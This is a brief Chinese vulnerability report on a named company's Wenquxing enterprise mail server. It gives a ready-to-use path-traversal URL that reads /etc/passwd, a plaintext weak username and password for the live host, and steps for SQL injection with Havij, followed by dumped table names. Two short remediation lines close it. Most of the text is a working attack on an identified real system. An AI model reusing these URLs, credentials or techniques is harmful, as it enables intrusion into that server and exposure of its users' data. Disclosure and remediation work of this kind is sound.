文曲星企业邮箱服务器存在任意文件读取漏洞和SQL注入漏洞,可以读取/目录下任意文件(包括服务器配置、系统用户、网页源码等),并可读写所有数据库
读取任意文件:(以/etc/passwd为例)
http://mail.ggv.com.cn/login.php?Lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.php
SQL注入:
1.使用弱密码登录
USERNAME: hansin
PASSWORD: hansin@12
2.提取登录cookie(用havij或类似工具)
3.使用前一步获得的cookie注入:http://mail.ggv.com.cn/messageshow.php?id=3
http://mail.ggv.com.cn/login.php?Lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.php
Current database
[4 tables]
+----------+
| address |
| logs |
| message |
| personal |
+----------+
修复方案:
限制服务器运行用户的权限
修改涉及$_GET[]的页面,修补SQL注射漏洞